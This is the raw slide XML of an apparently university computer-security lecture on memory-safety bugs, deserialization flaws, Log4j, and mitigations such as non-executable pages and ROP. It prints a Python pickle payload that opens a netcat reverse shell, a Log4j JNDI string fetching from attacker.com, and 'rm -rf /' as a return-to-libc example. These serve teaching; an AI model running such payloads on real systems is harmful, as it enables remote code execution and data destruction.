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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="369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70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EAD4D-D319-4657-9252-201D4AB06D44}">
  <a:tblStyle styleId="{3C4EAD4D-D319-4657-9252-201D4AB06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6F63FF-C5C4-4278-AC2D-502748384C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69"/>
    <p:restoredTop sz="80951"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="307" d="100"/>
          <a:sy n="307" d="100"/>
        </p:scale>
        <p:origin x="259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hamann.de/2020/04/05/exploiting-python-pickle/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ysoserial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UGf6aWiQI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20.cs161.org/lectures/4/lec04_optional.pdf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lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf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14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f732614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f732614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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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ff61f54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ff61f54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https://davidhamann.de/2020/04/05/exploiting-python-pickle/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55ff61f5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55ff61f5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https://github.com/frohoff/ysoserial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5ff61f54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5ff61f54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https://xkcd.com/2347/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55ff61f54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55ff61f54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f732614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f732614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Amdahl’s Law applies to your time as well!</a:t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5ff61f54e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5ff61f54e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5ff61f54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5ff61f54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7f732614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7f732614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8a37c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d8a37c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f732614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77f732614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f732614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f732614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f73261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f73261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memory safety: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https://www.youtube.com/watch?v=d8UGf6aWiQI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https://su20.cs161.org/lectures/4/lec04_optional.pdf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d8a37c2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d8a37c2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f732614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f732614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7f732614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7f732614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7f73261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7f73261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f732614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f732614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7f732614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7f732614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7f732614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7f732614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d8a37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d8a37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7f732614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7f732614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7f732614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7f732614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7f73261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7f73261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7f732614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7f732614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d8a37c2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d8a37c2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f732614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7f732614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583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7f732614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7f732614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7f73261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7f73261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77f732614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77f732614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f732614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77f732614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f732614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f732614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77f732614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77f732614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7f732614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7f732614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77f732614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77f732614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7f732614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7f732614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77f732614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77f732614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7f732614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77f732614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f73261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77f73261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7f732614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77f732614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f732614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f732614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77f732614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77f732614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7f732614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77f732614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77f73261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77f73261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7f732614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7f732614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f732614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77f732614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7f732614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7f732614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77f732614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77f732614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7f73261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7f73261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77f732614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77f732614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d8a37c2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7d8a37c2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77f732614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77f732614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77f732614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77f732614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77f73261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77f73261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77f732614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77f732614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7f732614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7f732614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77f73261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77f73261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d8a37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d8a37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77f732614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77f732614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f732614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77f732614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7f7326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7f7326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77f732614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77f732614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d8a37c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7d8a37c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77f732614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77f732614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f73261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77f73261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7f732614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7f732614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77f732614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77f732614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77f732614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77f732614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7f732614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7f732614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77f73261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77f73261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77f732614_0_1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77f732614_0_1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7d8a37c2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7d8a37c2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77f732614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77f732614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7f732614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7f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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7f732614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7f732614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77f732614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77f732614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7d8a37c2f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7d8a37c2f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77f732614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77f732614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7f732614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7f732614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https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf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377f732614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377f732614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77f732614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77f732614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77f732614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77f732614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there needs to be liability? ~Nick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https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit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77f732614_0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77f732614_0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77f732614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77f732614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77f732614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77f732614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7f732614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7f732614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55ff61f54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55ff61f54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55ff61f54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55ff61f54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5ff61f54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5ff61f54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5ff61f54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5ff61f54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55ff61f5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55ff61f5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5ff61f54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5ff61f54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55ff61f54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55ff61f54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5ff61f54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5ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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2F89B43-D26F-643E-8D0F-306AA9398AB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119.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/43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we.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide99.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94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20.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/787.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/19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dirty="0"/>
              <a:t>Assignment # 4 due today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next Tuesday</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Project #3 due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Course Evaluation is out! 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Extra 1%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Submit at Canvas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Class Participation Credits (extra 5% max)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Baseline: 1%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If you want more than 1%, come to any of my office hours starting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Dec.5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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86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most applications, the performance difference from using a memory-safe language is insignificant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exceptions: Operating systems, high performance games, some embedded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C’s improved performance is not a direct result of its security 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Historically, safer languages were slower, so there was a tradeoff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Today, safe alternatives have comparable performance (e.g. Go and Rust)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C code (with bounds checking) ends up running as quickly as code in a memory-safe language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don’t need to pick between security and performance: You can have both!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Robust Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;108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Sleds</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p1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Instead of having to jump to an exact address, make it “close enough” so that small shifts don’t break your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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Short for no-operation or no-op, an instruction that does nothing (except advance the EIP)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Chaining a long sequence of NOPs means that landing anywhere in the sled will bring you to your shellcode</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094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1095" name="Google Shape;1095;p116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094250" y="1215625"/>
            <a:ext cx="1378200" cy="382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6" name="Google Shape;1096;p116"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7936950" y="129327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1102" name="Google Shape;1102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in Java and Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p1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87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Memory safety vulnerabilities are almost exclusively in C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Java and Python have a related problem: serialization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Serialization is a huge land-mine that is easy to trigger</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110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Serialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p1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some complex data structure (e.g. objects pointing to objects pointing to objects)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save your program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want to transfer this state to another running copy of your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Manually write and parse a custom file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The code and the custom format are probably pretty ugly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Extra programming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You may make errors in your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Use a serialization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converts any object into a file (and back)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is a built-in Java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is a built-in Python library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p1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libraries can load and save arbitrary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objects might contain code that can be executed (e.g. functions)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attacker provides a malicious file to be deserialized?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program loads a serialized file from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deserializing the object, the code from the attacker executes!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132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 exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138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1139" name="Google Shape;1139;p1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import base64, os, pickle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class RCE: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def __reduce__(self):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cmd =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'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f'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'/bin/sh -i 2&gt;&amp;1 | nc 127.0.0.1 1234 &gt; /tmp/f'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return os.system, (cmd,)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pickled = pickle.dumps(RCE())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print(base64.b64encode(pickled).decode('ascii'))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Java</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p1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Exploiting serialization is a little harder in Java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latest Java includes some protections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Deserialized code is not allowed to call certain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Don't allow a deserialized object to invoke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java.lang.Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> and call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 dirty="0"/>
              <a:t> (which can execute arbitrary programs)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Sometimes called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>denylist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> or blacklist, as we’ll see later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Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>Denylists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>brittle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forget to include a dangerous library in your list, attackers can exploit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Attackers have automated tools to exploit this</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146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1152" name="Google Shape;1152;p1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826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Logging: Recording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Being a good programmer, you want to record things that happen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Log4j: A very common Java framework for logging information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Even if your Java code doesn’t use Log4j, you may be importing some third-party code that uses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Unfortunately, there was a bug added…</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153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pic>
        <p:nvPicPr>
          <p:cNvPr id="1154" name="Google Shape;115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62" y="1194175"/>
            <a:ext cx="3006188" cy="3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 and JNDI (Java Naming &amp; Directory Interface)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160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1161" name="Google Shape;1161;p1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JNDI (Java Naming &amp; Directory Interface): A service to fetch data from outside places (e.g. the Internet)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 has a pretty powerful format string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logged string is fully created, Log4j parses the format strings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Log4j saw the string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${jndi:ldap://attacker.com/pwnage}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Log4j thinks: “This is a JNDI object I need to include’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get that object from attacker.com”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deserialize that Java object”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Because a logged string included a reference that Java fetches from the network and deserializes, the attacker can use it to exploit programs!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Programmer time matters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save more time writing code in a memory-safe language than you save in performance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“Slower” memory-safe languages often have libraries that plug into fast, secure, C libraries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NumPy in Python (memory-safe)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Serialization: Detection and Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Google Shape;1167;p1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Look for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 dirty="0"/>
              <a:t> in Java and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 dirty="0"/>
              <a:t> in Python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an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> provide input to these functions?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If the code runs on your server and you accept data from users, you should assume that the users might be malicious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Refactor the code to use safe alternatives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JSON (Java Script Object Notation)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Protocol buffers</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p1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Buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker overwrites unintended parts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Stack smashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker overwrites saved registers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Memory-safe code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Fixing code to avoid buffer overflows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Integer memory safety vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits how integers are represented in C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Format string vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the arguments to printf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Heap vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the heap layout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Serialization vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker provides a malicious object to be deserialized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Writing robust exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Making exploits work in different environments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Tomorrow: Defending against memory safety vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;117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Reason: Legacy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 actual reason: inertia and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>legacy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Huge existing code bases are written in C, and building on existing code is easier than starting from scratch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old code is written in {language}, new code will be written in {language}!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Learn to write memory-safe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Defensive programming: Always add checks in your code just in case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Always check a pointer is not null before dereferencing it, even if you’re sure the pointer is going to be valid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safe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functions that check bounds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dirty="0"/>
              <a:t> instead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 dirty="0"/>
              <a:t> or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snprintf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 or tools that check your program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Structure user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Constrain how untrusted sources can interact with the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When asking a user to input their age, only allow digits (0–9) as inputs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Reason carefully about your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writing code, define a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>preconditions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>postconditions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>invariants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> that must be satisfied for the code to be memory-safe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Rarely used in practice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Secure Software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tools for analyzing and patching insecure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bounds-checking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involve performance overhead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 if the check fails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code for run-time misbehavior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Look for illegal calling sequences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Your code never calls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/>
              <a:t>, but you notice that your code is executing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too late by the time you detect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potential damage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Run system components in sandboxes or virtual machines (VMs)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privilege separation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Mitigating Memory Safety Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="4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Bug-finding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Excellent resource, as long as there aren’t too many false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someone to look over your code for memory safety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very effective… but also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your systems for known flaws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(“pen-testing”)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someone to break into your system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Software Security Issues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programs for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 testing: Random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like Valgrind (tool for detecting memory leaks)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corner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tell if we’ve found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 crash or other unexpected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that we’ve tested enough?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know, but code-coverage tools can help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Towards Secure Systems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software often imports lots of different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often updated with security patches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enough to keep your own code secure: You also need to keep libraries updated with the latest security patches!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hard about patching?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require restarting production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break crucial functionality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tools for analyzing and patching insecure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Add mitigations that make it harder to exploit common vulnerabilities.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has just handed you a large, existing codebase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written in a memory-safe language, and it wasn’t written with memory safety in mind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protect this code from exploits without having to completely rewrite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Exploit mitigations (code hardening)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Compiler and runtime defenses that make common exploits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ways to turn attempted exploits into program crashes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Crashing is safer than exploitation: The attacker can crash our system, but at least they can’t execute arbitrary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Mitigations are cheap (low overhead) but not free (some costs associated with them)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Non-Executable Pages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Non-executable pages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Memory Safety Mitigations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layout randomization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228686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Most programs don’t need memory that is both written to and executed, so make portions of memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> writable but not both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Stack, heap, and static data: Writable but not executable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Code: Executable but not writable</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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" name="Google Shape;246;p41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDC815F-BEED-0005-1CB3-74895FCE1E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489329"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4764033" y="1224317"/>
          <a:ext cx="1522325" cy="3511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Stack</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" dirty="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Code</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" dirty="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Google Shape;708;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8720F345-DC0D-8077-745E-A34ED9D5D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96998"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6560708" y="1151617"/>
          <a:ext cx="2186100" cy="3657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 dirty="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Page table entries have a writable bit and an executable bit that can be set to achieve this behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall page tables: Converts virtual addresses to physical addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implemented in hardware, so effectively 0 overhead!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>W^X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (write XOR execute)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Data Execution Prevention, name used by Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>No-execute bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (the name of the bit itself)</a:t>
            </a:r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6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Issue: Non-executable pages doesn’t prevent an attacker from leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> code in memory as part of the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programs have many functions loaded into memory that can be used for malicious behavior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Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: An exploit technique that overwrites the RIP to jump to a functions in the standard C library (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>) or a common operating system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Return-oriented programming (ROP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Constructing custom shellcode using pieces of code that already exist in memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;2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Per the x86 calling convention, each program expects arguments to be placed directly above the RIP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function, which executes a shell command. We want to execute it like this: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139350" y="3427325"/>
            <a:ext cx="2865300" cy="6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char cmd[] = "rm -rf /";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system(cmd);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8" name="Google Shape;298;p4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299" name="Google Shape;299;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="298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01" name="Google Shape;301;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30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02" name="Google Shape;302;p4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03" name="Google Shape;303;p48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39125" y="2002750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761159" y="28365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06" name="Google Shape;306;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="305" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="29442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8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15" name="Google Shape;315;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31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16" name="Google Shape;316;p4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7" name="Google Shape;317;p49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761159" y="2982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20" name="Google Shape;320;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="319" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3090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5" name="Google Shape;325;p4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26" name="Google Shape;326;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32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9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36" name="Google Shape;336;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="335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37" name="Google Shape;337;p5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8" name="Google Shape;338;p50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761159" y="31413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40" name="Google Shape;340;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="339" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="32490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5" name="Google Shape;345;p5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46" name="Google Shape;346;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3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50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324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57" name="Google Shape;357;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4805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58" name="Google Shape;358;p5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59" name="Google Shape;359;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3300269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60" name="Google Shape;360;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="359" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3407969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5" name="Google Shape;365;p51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66" name="Google Shape;366;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36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51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305500" y="3022587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77" name="Google Shape;377;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="376" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="3191937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8" name="Google Shape;378;p5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2761159" y="34396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80" name="Google Shape;380;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="379" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="35473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5" name="Google Shape;385;p5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86" name="Google Shape;386;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38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2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305500" y="272628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97" name="Google Shape;397;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="396" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="289563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8" name="Google Shape;398;p5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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="2220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00" name="Google Shape;400;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="399" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="2328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5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406" name="Google Shape;406;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="40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7" name="Google Shape;407;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295625" y="1137753"/>
            <a:ext cx="4926000" cy="1472850"/>
            <a:chOff x="1295625" y="1137753"/>
            <a:chExt cx="4926000" cy="1472850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408" name="Google Shape;408;p53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295625" y="1137753"/>
              <a:ext cx="3740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jumped into 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system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> function, and it expects the first argument to be 4 bytes above the ESP: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"rm -rf /"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409" name="Google Shape;409;p53"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="408" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5036325" y="1553403"/>
              <a:ext cx="1185300" cy="10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0" name="Google Shape;410;p53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seen how widespread and dangerous memory safety vulnerabilities can be. Why do these vulnerabilities exist?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Programming languages aren’t designed well for security.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often aren’t security-aware.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write code without designing security in from the start.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are humans. Humans make mistakes.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executing an existing function, execute your own code by executing different pieces of different code!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jump to the beginning of a function: We can jump into the middle of it to just take the code chunks that we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Gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A small set of assembly instructions that already exist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usually end in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are usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> full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strategy: We write a chain of return addresses starting at the RIP to achieve the behavior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return address points to a gadget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gadget executes its instructions and ends with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 jumps to the address of the next gadget on the stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;41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26" name="Google Shape;426;p5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27" name="Google Shape;42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35" name="Google Shape;435;p56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2474300" y="2900725"/>
